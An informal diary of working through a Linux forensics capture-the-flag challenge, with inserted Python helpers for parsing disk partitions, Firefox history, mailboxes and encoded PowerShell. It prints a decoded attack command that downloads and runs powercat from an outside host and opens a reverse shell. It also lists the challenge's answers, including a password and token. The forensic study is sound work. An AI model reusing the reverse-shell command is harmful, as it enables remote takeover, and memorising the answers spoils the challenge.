cyber defenders challenge MR. GAMER (Linux forensics)

(begun on 12 August 2022, finished on 15 September 2022)

(warning: super informal, not professional, mostly unfiltered. apologies.)

for screenshots, visit https://github.com/dakshita-joshi/Cyber-Defenders-Challenge-Mr.-Gamer


install p7zip

unzip folder

install libewf ewf tools

research e01 expert witness file types, how to read, analyse, mount

make mount directory and try to mount

failed with permission denied

troubleshoot

in parallel, download ftk imager and try it from cli

also in parallel, install wine and try it from windows, since a trial of the folder on windows showed binary stream and other encoded data (WINE SUCKS ASS)

meanwhile, since no other option remains except to enter sudo su root, onward (disabling automount seems unwise, messing with root also seems unwise but hey)

install sleuthkit, then work on /mnt/ewf/ewf1

mmls ewf1 and see the partition table (there is a partition with no description that i cannot make sense of)

mkdir for e02 and continue same as yesterday to get an overview of the partitions

heres a lesson, always read up on theory first before blindly rushing into a challenge. was trying to mount the e01-8 files separately thinking they were all different disc images when i read that only the e01 file needs to be mounted and the rest are all pointed to one after the other. so while reading up on theory and detail might seem boring and time consuming its v v imp because it saves time later when you are trying to execute the plan.

so i had to create a logical mount point. mounting without a logical mount point resulted in a cannot find in /etc/fstab error. so i created a logical mount point, then calculated the offset from mmls (512 * the partition's start sector). then mounting w the logical mount point resulted in cannot mount /dev/loop11 in ro mode. one google search later, had to add the norecovery flag after ro in mount -o.

mount -o ro,norecovery,loop,offset=537919488 /mnt/ewf/ewf1 /mntl 
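the offset arithmetic above is easy to get wrong by hand, so here is an added example (mine, not part of the original write-up) that parses mmls output, skips the meta and unallocated rows, multiplies each start sector by the sector size mmls reports, and prints the matching read-only mount command. the mmls text is a constructed sample; only the last partition's start sector (1050624 * 512 = 537919488) is chosen to match the offset used above.

```python
import re
import shlex

# Constructed sample of `mmls` (Sleuth Kit) output. The numbers are made up,
# except that the last partition's start sector matches the offset used in the
# mount command above (1050624 sectors * 512 bytes = 537919488).
SAMPLE_MMLS = """\
DOS Partition Table
Offset Sector: 0
Units are in 512-byte sectors

      Slot      Start        End          Length       Description
000:  Meta      0000000000   0000000000   0000000001   Primary Table (#0)
001:  -------   0000000000   0000002047   0000002048   Unallocated
002:  000:000   0000002048   0001050623   0001048576   Linux (0x83)
003:  000:001   0001050624   0083886079   0082835456   Linux (0x83)
"""

UNITS_RE = re.compile(r"Units are in (\d+)-byte sectors")
ROW_RE = re.compile(r"^(\d+):\s+(\S+)\s+(\d+)\s+(\d+)\s+(\d+)\s+(.*?)\s*$")


def parse_mmls(text):
    """Return (sector_size, rows); each row is a dict with int start/end/length."""
    m = UNITS_RE.search(text)
    if not m:
        raise ValueError("no 'Units are in N-byte sectors' line in mmls output")
    sector_size = int(m.group(1))
    rows = []
    for line in text.splitlines():
        r = ROW_RE.match(line)
        if not r:
            continue  # header, blank line or the 'Offset Sector' line
        rows.append({
            "index": int(r.group(1)),
            "slot": r.group(2),
            "start": int(r.group(3)),
            "end": int(r.group(4)),
            "length": int(r.group(5)),
            "description": r.group(6),
        })
    return sector_size, rows


def mountable_partitions(rows):
    """Drop the partition-table meta entry and unallocated gaps; the rest hold filesystems."""
    return [r for r in rows if r["slot"] != "Meta" and r["description"] != "Unallocated"]


def byte_offset(row, sector_size):
    """mount wants a byte offset, mmls reports sectors."""
    return row["start"] * sector_size


def mount_command(image, row, sector_size, mountpoint):
    """Read-only loop mount. norecovery stops the journal replay that fails on a
    read-only ewfmount image (the 'cannot mount /dev/loop11 in ro mode' error above)."""
    opts = f"ro,norecovery,loop,offset={byte_offset(row, sector_size)}"
    return f"mount -o {opts} {shlex.quote(image)} {shlex.quote(mountpoint)}"


if __name__ == "__main__":
    size, rows = parse_mmls(SAMPLE_MMLS)
    for r in mountable_partitions(rows):
        print(f"{r['index']:03d} {r['description']:<16} offset={byte_offset(r, size)}")
        print("  " + mount_command("/mnt/ewf/ewf1", r, size, "/mntl"))
```

on a real image, pipe the actual mmls output into parse_mmls instead of the sample; the sector size line matters because 4K-sector images would give a different offset.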

cd /mntl

ls

now chroot

should i chroot? or should i explore sleuthkit?

chroot. sleuthkit in next attempt(i hate autopsy btw. all my homies hate autopsy)

chroot working. trying commands on my own pc terminal and then case terminal

right. wow. 

lsb_release -a gives version id of ubuntu

found metasploit meterpreter 

just going thru their files and folders. this is gossip girl but for tech

nano /etc/hostname for hostname (rshell -lenovo)

learnt that .bash_history is hidden because of the leading . and ls -a reveals all files, even hidden ones. accessing .bash_history

will process that later and see what they got up to. in the meantime went to .minecraft and accessed the usercache json file. got the uuid of the attacker. also from the versions dir and then the json file version_manifest_v2.json got the sha1 hash of the latest version.

now that i think ab it. wasnt there some stuff about a minecraft player taking advantage of a log4j vulnerability etc etc. lemme read up on this gurl

next question ab the anime says little blue birdie so im assuming i need to explore the users twitter

ok so probs somewhere in the firefox history. 

cant find it. discord in the meantime. /home/rafael/.config/discord/0.0.16/modules# nano installed.json. all the installed module versions are there. the highest is discord_voice

yaa the anime thing >:( anyway the yt video was rick astley and the second video upload date i got from the channel 25 oct 2009

aight snap firefox shows some hope. current also has a symbolic link to 941. so ill travel to 941 and poke around from history

cache2 has all hex hashes of urls, how do i figure out the url from the hashed value?!

roight anyway. found places.sqlite which is the mozilla history, ive been told by stack overflow. so i need to find an sql data visualiser and then perhaps see more. im putting this on the back burner for now and exploring other stuff that i dont need to go outside the terminal for. the location for easy access is /home/rafael/snap/firefox/common/.mozilla/firefox/mcrcm1xn.default. ill see if the firefox dir before common also has the mcr-whatever profile and so a places.sqlite. no, it doesnt, anyway.
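you dont actually need a gui visualiser for places.sqlite; python's built-in sqlite3 does it. this is an added example (mine, not from the write-up) that builds a small in-memory copy of the two history tables firefox uses, moz_places and moz_historyvisits, with constructed rows, and joins them into a chronological visit list. the timestamps follow firefox's convention of microseconds since the unix epoch. the schema here is a cut-down subset of the real one (only the columns used), and open_places is the function you would point at the real file on the mounted image.

```python
import sqlite3
from datetime import datetime, timezone

# Cut-down subset of the Firefox places.sqlite schema: only the columns this
# example reads. The real tables have many more columns.
PLACES_SCHEMA = """
CREATE TABLE moz_places (
    id INTEGER PRIMARY KEY,
    url TEXT,
    title TEXT,
    visit_count INTEGER DEFAULT 0,
    last_visit_date INTEGER
);
CREATE TABLE moz_historyvisits (
    id INTEGER PRIMARY KEY,
    from_visit INTEGER,
    place_id INTEGER,
    visit_date INTEGER,
    visit_type INTEGER
);
"""

# Constructed sample rows (made-up browsing on 11 Feb 2022). Firefox stores
# visit_date / last_visit_date as microseconds since the Unix epoch, in UTC.
SAMPLE_PLACES = [
    (1, "https://twitter.com/home", "Home / Twitter", 2, 1644575400000000),
    (2, "https://www.youtube.com/watch?v=EXAMPLE", "some video", 1, 1644576000000000),
    (3, "https://linfo.org/", "LINFO", 1, 1644579600000000),
]
SAMPLE_VISITS = [
    # (id, from_visit, place_id, visit_date, visit_type)
    (1, 0, 1, 1644572400000000, 1),  # 09:40 twitter, followed a link
    (2, 1, 2, 1644576000000000, 1),  # 10:40 youtube, reached from visit 1
    (3, 0, 1, 1644575400000000, 2),  # 10:30 twitter, typed into the url bar
    (4, 0, 3, 1644579600000000, 1),  # 11:40 linfo
]

# Firefox visit_type codes (link, typed, bookmark, ..., download).
VISIT_TYPES = {1: "link", 2: "typed", 3: "bookmark", 5: "redirect-perm",
               6: "redirect-temp", 7: "download"}


def load_sample():
    """In-memory database with the constructed rows above."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(PLACES_SCHEMA)
    conn.executemany("INSERT INTO moz_places VALUES (?,?,?,?,?)", SAMPLE_PLACES)
    conn.executemany("INSERT INTO moz_historyvisits VALUES (?,?,?,?,?)", SAMPLE_VISITS)
    return conn


def open_places(path):
    """Open a real places.sqlite. immutable=1 tells SQLite not to touch journal
    or lock files, so it works on a read-only mount like /mntl."""
    return sqlite3.connect(f"file:{path}?immutable=1", uri=True)


def prtime_to_iso(microseconds):
    return datetime.fromtimestamp(microseconds / 1_000_000, tz=timezone.utc).strftime(
        "%Y-%m-%d %H:%M:%S UTC")


def history(conn, url_like="%"):
    """Chronological visits joined with url/title; url_like is an SQL LIKE pattern."""
    rows = conn.execute(
        """
        SELECT v.visit_date, p.url, p.title, v.visit_type
        FROM moz_historyvisits v JOIN moz_places p ON p.id = v.place_id
        WHERE p.url LIKE ?
        ORDER BY v.visit_date
        """,
        (url_like,),
    ).fetchall()
    return [(prtime_to_iso(d), url, title, VISIT_TYPES.get(t, str(t)))
            for d, url, title, t in rows]


if __name__ == "__main__":
    conn = load_sample()
    for when, url, title, kind in history(conn, "%twitter.com%"):
        print(when, kind, url, title)
```

swap load_sample() for open_places("/mntl/home/rafael/snap/firefox/common/.mozilla/firefox/mcrcm1xn.default/places.sqlite") to run it on the image; the LIKE pattern is how you narrow it to the little blue birdie.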

yooo the little blue birdie might be thunderbird?? but its a mail service how can it have anime history ugh

the user watched a video question i answered from exploring their screenshots. i found the temperature in the ss too but its 12 of feb not 11? and found a hashes file that says guest which im assuming is for the guest wifi but its a hash not a passwd.

hello i found linfo.org love itt. 

hello back at it again after a brief ctf break and guess what? i dont remember a damn thing i did and its only been a month yay whos surprised not me

right back in the game. now the questions.

the vpn service was zerotier. got it from var/lib

gnome keyring seems to be the way to password hashes and decrypting passwords. cant seem to figure out how to decipher tho. i can also see the login history of the guest user and possibly find sth from there since the password asked is from guest wifi. guest here means guest login session, right?

found screenshots in poc from marshalsec. binging with babish is the cookbook. also the screenshot for 11 feb 2022 shows 45 f but when i enter it says invalid. idk?? but at least i can answer the cook book question. SPACE THE TEMPERATURE I DIDNT HAVE TO PUT SPACE BUT I DID AND UGH. the babish answer is babish culinary universe.

powercat answer is also seemingly in marshalsec. why didnt i pay more attention to it earlier? went on a trip to outer space and /var and /sbin and .cache and whatnot. anyway at least i learned a lot.

oh also i got frustrated and took the hint for the guest wifi and it says check email. writing here so i remember.

okay FOUND INBOX IN /home/rafael/.thunderbird/vrvcx2qf.default-release/ImapMail/imap.gmail.com. now to move it to my home folder so i can rename it with an mbox extension and open it with thunderbird.

:( i mounted it as a read only file system and now it wont let me cp, mv or rename or anything i am so sad. do i remount it?

if (hear me out), i opened a connection from this disk image to my computer and then transferred the image? can i open connections on a read only file system?

opened a terminal that wasnt in /mntl chroot, went to mntl thru normal terminal and copied it to my home file, then compared sizes to see if the files were copied aight. they were. 

sudo chmod it to be able to open. sudo chmod a+rwx. but for some reason my thunderbird isnt reading it?? tried a lot but ended up opening it in gedit and searching word by word. anime is Attack On Titan (rafael is a really basic sort of guy lol). guest wifi password was also here. many were, but first means oldest so it was 093483
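searching the INBOX file word by word in gedit works, but since it is plain mbox, python's mailbox module can parse it properly and sort by the Date header, which is what "first means oldest" actually needs (file order is not always date order). this is an added example of mine, not from the write-up: it writes a constructed three-message mbox (made-up addresses, dates and PLACEHOLDER passwords), then returns every message mentioning a keyword, oldest first. point messages_mentioning at the copy of INBOX you pulled out of the image to use it for real.

```python
import mailbox
import os
import re
import tempfile
from email.utils import parsedate_to_datetime

# Constructed sample mailbox in mbox format (the format of Thunderbird's
# ImapMail/<server>/INBOX file). Addresses, dates and passwords are made up.
# Note the messages are deliberately NOT in date order in the file.
SAMPLE_MBOX = """\
From alice@example.invalid Thu Feb 10 09:00:00 2022
From: alice@example.invalid
To: rafael@example.invalid
Subject: weekend plans
Date: Thu, 10 Feb 2022 09:00:00 +0000
Content-Type: text/plain; charset="utf-8"

hey, the guest wifi password is still PLACEHOLDER-NEWER, right?

From bob@example.invalid Wed Feb 09 20:15:00 2022
From: bob@example.invalid
To: rafael@example.invalid
Subject: your new router
Date: Wed, 09 Feb 2022 20:15:00 +0000
Content-Type: text/plain; charset="utf-8"

set up the guest wifi for you, password is PLACEHOLDER-OLDEST. change it later.

From carol@example.invalid Sat Feb 12 18:30:00 2022
From: carol@example.invalid
To: rafael@example.invalid
Subject: watch this
Date: Sat, 12 Feb 2022 18:30:00 +0000
Content-Type: text/plain; charset="utf-8"

you'd like this anime, start with season one.
"""


def write_sample_mbox(directory=None):
    """Write the constructed mailbox to a writable directory and return its path."""
    directory = directory or tempfile.mkdtemp()
    path = os.path.join(directory, "INBOX")
    with open(path, "w", encoding="utf-8") as f:
        f.write(SAMPLE_MBOX)
    return path


def message_text(msg):
    """Concatenate every decoded text/* part so the search sees the real body,
    not base64 or quoted-printable transfer encoding."""
    chunks = []
    for part in msg.walk():  # walk() yields the message itself when it is not multipart
        if part.get_content_maintype() != "text":
            continue
        payload = part.get_payload(decode=True) or b""
        chunks.append(payload.decode(part.get_content_charset() or "utf-8", errors="replace"))
    return "\n".join(chunks)


def messages_mentioning(path, keyword):
    """Return [(datetime, from, subject, first matching body line)] oldest first."""
    pattern = re.compile(re.escape(keyword), re.IGNORECASE)
    hits = []
    for msg in mailbox.mbox(path):
        text = message_text(msg)
        line = next((l for l in text.splitlines() if pattern.search(l)), None)
        if line is None and not pattern.search(msg.get("Subject", "")):
            continue
        date_hdr = msg.get("Date")
        if not date_hdr:
            continue  # undated message: skip rather than mis-order it
        try:
            when = parsedate_to_datetime(date_hdr)
        except (TypeError, ValueError):
            continue
        hits.append((when, msg.get("From", ""), msg.get("Subject", ""), line))
    hits.sort(key=lambda h: h[0])
    return hits


def oldest_mention(path, keyword):
    hits = messages_mentioning(path, keyword)
    return hits[0] if hits else None


if __name__ == "__main__":
    inbox = write_sample_mbox()
    for when, sender, subject, line in messages_mentioning(inbox, "wifi"):
        print(when.isoformat(), sender, repr(subject), "->", line)
```

the mailbox module wants to open the file for writing, so as in the write-up copy INBOX out of the read-only mount first.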

now the rce values that were passed to powercat, the mojang client token and minecraft overlords or something. the client token and minecraft i can find around in the same folders or vicinities of folders so lets do that. first i gotta search what a client token and this overworld overlord thing even is.

the client token is stored in the java keystore in etc/java/pki and then ill find it i guess. would it be java8 or java11?

its stupid to go around wondering where anything is so i just go to mntl and search for keystore and then go the locations the path says. then ill figure out the stuff. 

"JAR=/usr/share/ca-certificates-java/ca-certificates-java.jar" found in jks-keystore. its a bash script that i think gives the location for the keystore?

lmao no it doesnt. it does take me to the ca certificates file which i extract and go to the keystore handler class so at least im sure i need a password to access the jks file which i believe is Matrix_1999. but where is this jks file??? do i need to make an authentication request to the mojang server with this key?

https://www.reddit.com/r/admincraft/comments/2ajrm2/how_joining_a_server_works/. trying information from this reddit post. first order of business is to check the lastlogin file, then use keytool to explore this user.keystore i found in /home/rafael/.local/share/keyrings. the 2 files are login.keyring and user.keystore. 

anyway found the values passed to powercat in /mntl/home/rafael/marshalsec/poc Log4jRCE.java. they were, as the hint suggested, base64'ed. put in cyberchef, baked and got

p.o.w.e.r.s.h.e.l.l. .-.c. .".I.E.X.(.N.e.w.-.O.b.j.e.c.t. .S.y.s.t.e.m...N.e.t...W.e.b.C.l.i.e.n.t.)...D.o.w.n.l.o.a.d.S.t.r.i.n.g.(.'.h.t.t.p.:././.1.9.2...1.6.8...1.9.1...2.5.3.:.8.0.0.0./.p.o.w.e.r.c.a.t...p.s.1.'.).;.p.o.w.e.r.c.a.t. .-.c. .1.9.2...1.6.8...1.9.1...2.5.3. .-.p. .4.4.4.4. .-.e. .c.m.d."

the ans is -c 192.168.191.253 -p 4444 -e cmd
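the dots between every letter in the cyberchef output are not noise: powershell's encoded-command form is UTF-16LE before base64, so every ascii character is followed by a zero byte, and a raw-bytes view draws each zero as a dot. this added example (mine, not the author's or marshalsec's) decodes such a blob, shows the dotted raw view for comparison, and pulls out the download url and the powercat arguments with a regex. the page only quotes the decoded command, so SAMPLE_B64 is rebuilt from it here rather than taken from Log4jRCE.java.

```python
import base64
import re

# The decoded command as shown above. The base64 blob is constructed from it
# the way PowerShell's encoded form works (UTF-16LE, then base64), because the
# original blob is not quoted on the page.
DECODED_COMMAND = (
    "powershell -c \"IEX(New-Object System.Net.WebClient).DownloadString("
    "'http://192.168.191.253:8000/powercat.ps1');"
    "powercat -c 192.168.191.253 -p 4444 -e cmd\""
)
SAMPLE_B64 = base64.b64encode(DECODED_COMMAND.encode("utf-16-le")).decode("ascii")

# Constructed plain UTF-8 blob, to show the fallback path.
UTF8_SAMPLE_B64 = base64.b64encode(b"echo hi").decode("ascii")


def looks_utf16le(raw):
    """Heuristic: in UTF-16LE text that is mostly ASCII, the odd bytes are zero."""
    return len(raw) % 2 == 0 and raw[1::2].count(0) > len(raw) // 4


def decode_encoded_command(b64):
    """base64 -> text, choosing UTF-16LE when the zero-byte pattern is present."""
    raw = base64.b64decode(b64)
    if looks_utf16le(raw):
        return raw.decode("utf-16-le")
    return raw.decode("utf-8", errors="replace")


def dotted_view(b64):
    """What a raw-bytes viewer shows: printable bytes as-is, everything else as '.'.
    For UTF-16LE input this reproduces the p.o.w.e.r.s.h.e.l.l. pattern above."""
    raw = base64.b64decode(b64)
    return "".join(chr(b) if 32 <= b < 127 else "." for b in raw)


# 'powercat' followed by flag/value pairs, stopping at a quote.
POWERCAT_RE = re.compile(r"powercat\s+((?:-\w+\s+[^\s\"']+\s*)+)")
URL_RE = re.compile(r"https?://[^\s'\"()]+")


def powercat_args(command):
    m = POWERCAT_RE.search(command)
    return m.group(1).strip() if m else None


def summarize(b64):
    """Decode the blob and pull out the indicators a responder wants."""
    cmd = decode_encoded_command(b64)
    return {
        "command": cmd,
        "download_urls": URL_RE.findall(cmd),
        "powercat_args": powercat_args(cmd),
    }


if __name__ == "__main__":
    print(dotted_view(SAMPLE_B64)[:60], "...")
    for k, v in summarize(SAMPLE_B64).items():
        print(f"{k}: {v}")
```

the heuristic in looks_utf16le is what lets the same function handle both the UTF-16LE blob and an ordinary UTF-8 one without being told which it is.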

the dimension answer is one because i went to new world from home/.minecraft and then saves and saw only DIM1 which i assumed meant one dimension so its one. i dont know what any of this means and i am not trying to know.

ohhhhh the keystore. what a load of trouble. i want to take up baking again. is this a sign from god?

anyway i tried cping the user.keystore file from .local/share to my computer desktop and then i couldnt open and analyse it with keytool. it didnt work because first it could not find a java shared object file and then it couldnt recognise the keystore because it was an invalid format. even opening it in keystore analyser it could not recognise the keystore type so im confused? the versions are all updated and correct. then i learnt that the keyring must be exported, not copied, and i can alternatively just recursively copy the whole .gnupg folder from his system to mine and it will bring all trust data and the keyrings. tried that too, but i think i dont know enough to really understand the intricacies of a linux system. every link i see seems to assume im already linus torvalds so only half explains anything and i see other people understanding it too!! i feel like a first year med student trying to perform brain surgery.

FINALLY. found something that exported their old keyring data to their new computers keyring. they only copied and didnt seem to have the problems i am having so i guess i can do that too? i must confess i did see the magnet forensics write up and they mounted the E01 files using a vm app and then simply booted into rafaels disk with the given password and saw the client token. guess what, it costs money HA. never mind. i will try copying the keystore to mine and then opening it and if that doesnt work i guess ill simply write the answer from the writeup and pray to god to find money? idk. it seems unfair for money to give people an edge over others when all other information is accessible on the internet. but i guess im privileged too to even have internet. anyway this is not socialism o clock.

just for an experiment i tried to list my own keystore with keytool and it still says invalid format? im beginning to think this isnt a copying problem but really an update problem. ill try that avenue first and then copy rafaels keystore to mine.

not working. updated my java openjdk 11 then changed to oracle jdk 18. set it as default java and it did not work. in the rafael chroot it fails with libjli.so cannot open shared object. askubuntu says they encountered a similar problem in chroot and solved it by

mount --bind /proc /myroot/proc

so what does it mean?? how come other write ups dont mention any of these problems??? are they so trivial that they dont deserve mentioning? anyway i did bind the chroot proc to my proc. apparently proc is similar to mtab and gives the list of mount points

I DID IT! I DID IT OH MY GOD JESUS CHRIST ALL I HAD TO DO WAS SHUT DOWN AND BOOT AGAIN GOD.

anyway what followed from binding proc was that none of my java matters were solved. so i decided to try and unmount the image and then shut down and boot again. before that i noticed i had only copied the keystore and not rafaels keyring. the login in my passwords and keys was only for my system and not rafaels. so i copied both the keyring and the keystore and named them rafael.keyring etc. then i tried to unmount and it wouldnt. so i did lsof and it showed seahorse aka the keyrings process. then i killed the process but it still showed a busy target so i screamed for a while and then remembered i had bound our procs in eternal marriage or whatever. so i unmounted the proc, then unmounted mntl, then ewf. then i rebooted the pc, opened passwords and keys, saw the second login, logged in with Matrix_1999 and sure enough, the client token was there and it is 2f76c8b04c004ddd888a05a6cad6be52.

DONE!
